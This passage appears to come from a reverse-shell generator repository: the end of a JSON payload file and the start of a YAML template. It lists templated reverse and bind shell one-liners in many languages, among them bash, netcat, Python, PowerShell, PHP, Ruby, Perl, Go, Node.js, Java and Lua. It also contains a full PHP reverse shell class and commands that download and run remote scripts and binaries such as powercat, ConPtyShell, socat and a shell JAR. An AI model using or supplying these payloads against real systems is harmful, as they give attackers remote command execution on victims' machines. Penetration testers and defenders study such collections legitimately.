{port} >/tmp/f" 49 | }, 50 | "netcat-ssl": { 51 | "ncat": "ncat -e {shell_path} {host} {port} --ssl", 52 | "ncat-c": "ncat -c {shell_path} {host} {port} --ssl" 53 | }, 54 | "netcat-ssl-password": { 55 | "ncat-c": "ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}" 56 | }, 57 | "netcat-windows-password": { 58 | "ncat-c": "{binary_name}{ncat_args} -c \"echo|set /p=%random%=&powershell $k=Read-Host;write-host $k=;if($k -eq '{password}'){{{shell_path}}}\" {host} {port}" 59 | }, 60 | "telnet-linux": { 61 | "telnet": "rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p", 62 | "telnet-two_ports": "{binary_name} {host} {port}|{shell_path}|telnet {host} {port2}" 63 | }, 64 | "openssl-linux": { 65 | "openssl": "mkfifo /tmp/s;{shell_path} -i &1|{binary_name} s_client -quiet -connect {host}:{port}>/tmp/s;rm /tmp/s", 66 | "openssl-2": "mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect {host}:{port} > fifo; rm fifo" 67 | }, 68 | "python": { 69 | "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"", 70 | "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n try:\\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n except:\\n os._exit(0)\\ndef j():\\n while 1:\\n try:c.send(p.stdout.read(1).encode())\\n except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n c.connect((\\'{host}\\',{port}));break\\n except:\\n 
pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"", 71 | "python-pty": "{binary_name} -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('{shell_path}')\"", 72 | "python-pty-short": "{binary_name} -c \"a=__import__;s=a('socket');o=a('os').dup2;p=a('pty').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(('{host}',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p('{shell_path}')\"", 73 | "python-subprocess1": "{binary_name} -c \"socket=__import__('socket');subprocess=__import__('subprocess');os=__import__('os');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['{shell_path}','-i'])\"", 74 | "python-subprocess2": "{binary_name} -c \"a=__import__;b=a('socket').socket;p=a('subprocess').call;o=a('os').dup2;s=b();s.connect(('{host}',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(['{shell_path}','-i'])\"", 75 | "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}" 76 | }, 77 | "python-windows": { 78 | "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"", 79 | "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n try:\\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n except:\\n os._exit(0)\\ndef j():\\n while 1:\\n try:c.send(p.stdout.read(1).encode())\\n 
except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n c.connect((\\'{host}\\',{port}));break\\n except:\\n pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"", 80 | "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}" 81 | }, 82 | "powershell": { 83 | "powershell-1": "{binary_name} /nop /c \"$client=New-Object System.Net.Sockets.TCPClient('{host}',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2= $sendback+'PS '+(pwd).Path+'>';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\"", 84 | "powershell-2": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}}WriteToStream'';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"", 85 | "powershell-ssl": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object Net.Security.SslStream($NetworkStream,$false,({{$true}} -as 
[Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}};WriteToStream'';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"", 86 | "powershell-ConPty": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing);Invoke-ConPtyShell {host} {port}\"", 87 | "powercat-Github-1": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"", 88 | "powercat-Github-2": "{binary_name} \"IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"", 89 | "powercat-Github-3": "{binary_name} \"IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c {host} -p {port} -e {shell_path}\"" 90 | }, 91 | "csharp": { 92 | "csharp-csc": "echo using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new 
StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\\0&&for,/f,%p,in,('where,/r,%systemroot%\\Microsoft.NET\\Framework,csc.exe'),do,%p /out:%tmp%\\0.exe %tmp%\\0&&%tmp%\\0.exe&&del,/q %tmp%\\0.exe %tmp%\\0", 93 | "csharp-powershell-code": "$j=get-random;$d=@\"\nusing System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new 
DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}\n\"@;Add-Type -TypeDefinition $d -Language CSharp;iex \"[i$j]::Main()\"" 94 | }, 95 | "php": { 96 | "php-exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});exec('{shell_path} <&3 >&3 2>&3');\"", 97 | "php-shell_exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});shell_exec('{shell_path} <&3 >&3 2>&3');\"", 98 | "php-system": "{binary_name} -r \"$sock=fsockopen('{host}',{port});system('{shell_path} -i <&3 >&3 2>&3');\"", 99 | "php-passthru": "{binary_name} -r \"$sock=fsockopen('{host}',{port});passthru('{shell_path} -i <&3 >&3 2>&3');\"", 100 | "php-popen": "{binary_name} -r \"$sock=fsockopen('{host}',{port});popen('{shell_path} -i <&3 >&3 2>&3\",'r');\"", 101 | "php-proc_open": "{binary_name} -r \"$sock=fsockopen('{host}',{port});$proc=proc_open('{shell_path}',array(0=>$sock,1=>$sock,2=>$sock),$pipes);\"", 102 | "php-backtick": "{binary_name} -r \"$sock=fsockopen('{host}',{port});`{shell_path} <&3 >&3 2>&3`;\"", 103 | "php-code": "array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else 
if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','<',$data);$data=str_replace('>','>',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as 
$pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>" 104 | }, 105 | "php-windows": { 106 | "php": "echo \"array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else 
if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','<',$data);$data=str_replace('>','>',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else 
if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>\"|{binary_name}" 107 | }, 108 | "ruby-linux": { 109 | "ruby-spawn": "{binary_name} -rsocket -e\"spawn('{shell_path}',[:in,:out,:err]=>TCPSocket.new('{host}',{port}))\"", 110 | "ruby-sprintf": "{binary_name} -rsocket -e\"f=TCPSocket.open('{host}',{port}).to_i;exec sprintf('{shell_path} -i <&%d >&%d 2>&%d',f,f,f)\"", 111 | "ruby-new": "{binary_name} -rsocket -e \"exit if fork;c=TCPSocket.new('{host}',{port});loop{{c.gets.chomp!;(exit! 
if $_=='exit');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print io.read}}))rescue c.puts 'failed: #{{$_}}'}}\"", 112 | "ruby-windows": "{binary_name} -rsocket -e \"c=TCPSocket.new('{host}','{port}');while(cmd=c.gets);IO.popen({shell_path},'r'){{|io|c.print io.read}}end\"" 113 | }, 114 | "socat": { 115 | "socat": "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}", 116 | "socat-tty": "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane", 117 | "socat-linux": "wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane {protocol}:{host}:{port}" 118 | }, 119 | "golang-linux": { 120 | "golang": "echo 'package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go &&{binary_name} run /tmp/t.go&&rm /tmp/t.go" 121 | }, 122 | "golang-windows": { 123 | "golang": "echo package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\\0.go&{binary_name} run %tmp%\\0.go&del %tmp%\\0.go %tmp%\\0" 124 | }, 125 | "perl-linux": { 126 | "perl": "{binary_name} -e 'use Socket;$i=\"{host}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell_path} -i\");}};'", 127 | "perl-2": "{binary_name} -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{host}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" 128 | }, 129 | "perl-windows": { 130 | "perl": "{binary_name} -e \"use 
Socket;$i='{host}';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('{shell_path}');}};\"", 131 | "perl-2": "{binary_name} -MIO -e \"$c=new IO::Socket::INET(PeerAddr,'{host}:{port}');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\"" 132 | }, 133 | "java": { 134 | "java-jar": "{binary_name} -jar Reverse_Shell.jar {host} {port}", 135 | "java-jar-github": "wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar -O 0&&java -jar 0 {host} {port}&&del 0||rm 0", 136 | "java-jar3": "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java", 137 | "java-jsp": "https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp", 138 | "java-jsp2": "https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp", 139 | "java-jsp-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f raw>reverse.jsp", 140 | "java-war-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f war>reverse.war" 141 | }, 142 | "nodejs-linux": { 143 | "nodejs-async": "echo 'require(\"child_process\").exec(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}", 144 | "nodejs-sync": "echo 'require(\"child_process\").execSync(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}", 145 | "nodejs-spawn": "echo '!function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name}" 146 | }, 147 | "nodejs-windows": { 148 | "nodejs-async": "echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name}", 149 | "nodejs-sync": "echo require('child_process').execSync('nc -e {shell_path} {host} {port}')|{binary_name}", 150 | 
"nodejs-spawn": "echo !function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name}" 151 | }, 152 | "lua": { 153 | "lua5.1": "lua5.1 -e 'local host, port = \"{host}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'", 154 | "lua-linux": "{binary_name} -e \"require('socket');require('os');t=socket.tcp();t:connect('{host}','{port}');os.execute('{shell_path} -i <&3 >&3 2>&3');\"" 155 | }, 156 | "custom_payload_type": { 157 | "custom_payload_name": "custom_payload_value" 158 | } 159 | }, 160 | "bind": { 161 | "bash": { 162 | "bash-bind": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m" 163 | }, 164 | "netcat": { 165 | "nc": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m", 166 | "nc-e": "{binary_name} -Lnp {port} -e {shell_path}{nc_args}", 167 | "ncat-e": "ncat -lnp {port} -e {shell_path}{ncat_args}", 168 | "ncat-ssl": "ncat -lnp {port} -e {shell_path} --ssl", 169 | "DotnetCat": "dncat -lp {port} -e {shell_path}" 170 | }, 171 | "socat": { 172 | "socat": "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}", 173 | "socat-ssl": "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}" 174 | }, 175 | "python": { 176 | "python-bind": "{binary_name} -c \"import subprocess as u;c=__import__('socket').socket();c.bind(('{host}',{port}));c.listen(0);cc,a=c.accept();p=u.Popen(['{shell_path}'],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__('threading').Thread(target=lambda:[cc.send(p.stdout.read(1024)) for _ in 
iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if p.stdin.write(cc.recv(1024))]\"", 177 | "pwncat": "pwncat -l {host} {port} -e {shell_path}{pwncat_args}" 178 | }, 179 | "perl-linux": { 180 | "perl-bind": "{binary_name} -e 'use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"{shell_path} -i\");}};'" 181 | }, 182 | "perl-windows": { 183 | "perl-bind": "{binary_name} -e \"use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,'>&C');open(STDOUT,'>&C');open(STDERR,'>&C');exec('{shell_path}');}};\"" 184 | }, 185 | "golang": { 186 | "gotty-webshell": "gotty {gotty_args}-w --reconnect {shell_path}" 187 | }, 188 | "custom_payload_type": { 189 | "custom_payload_name": "custom_payload_value" 190 | } 191 | } 192 | } -------------------------------------------------------------------------------- /payloads_template.yml: -------------------------------------------------------------------------------- 1 | --- 2 | reverse: 3 | bash: 4 | Bash-i: "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1" 5 | Bash-l: "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1" 6 | Bash-p: "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1" 7 | Bash-c: "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'" 8 | Bash196: 0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196 9 | Bash-readline: exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do 10 | $line 2>&5 >&5; done 11 | Bash5: "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5" 12 | zsh: zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY 13 | 0>&$REPLY' 14 | bash-password: 15 | Bash-i: "{shell_path} -c 'echo -ne $RANDOM=;read k;case 
$k in '{password}'){shell_path} 16 | -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 17 | Bash-l: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 18 | -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 19 | Bash-p: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 20 | -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 21 | bash-ssl: 22 | Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client 23 | -quiet -connect {host}:{port} >/tmp/f 24 | Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client 25 | -quiet -connect {host}:{port} >/tmp/f 26 | Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client 27 | -quiet -connect {host}:{port} >/tmp/f 28 | bash-ssl-password: 29 | Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 30 | k;case $k in '{password}'){shell_path} -i;esac' 2>&1|openssl s_client -quiet 31 | -connect {host}:{port} >/tmp/f 32 | Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 